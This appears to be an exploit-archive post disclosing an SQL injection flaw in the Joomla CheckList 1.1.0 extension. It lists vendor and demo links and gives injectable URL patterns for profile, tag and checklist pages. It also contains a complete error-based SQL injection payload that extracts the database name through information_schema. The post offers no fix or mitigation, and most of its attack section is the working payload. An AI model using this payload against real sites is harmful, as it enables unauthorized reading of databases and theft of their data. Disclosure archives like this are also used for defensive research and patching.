Home / os / winmobile

Joomla CheckList 1.1.0 SQL Injection

Posted on 04 September 2017

# # # # # # Exploit Title: Joomla! Component CheckList 1.1.0 - SQL Injection # Dork: N/A # Date: 03.09.2017 # Vendor Homepage: http://joomplace.com/ # Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/ # Demo: http://checklistdemo.joomplace.com/ # Version: 1.1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/[PROFILE][SQL].html # http://localhost/[PATH]/[TAG][SQL].html # http://localhost/[PATH]/[CHECKLIST][SQL].html # # our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html # # Etc.. # # # # #

 

TOP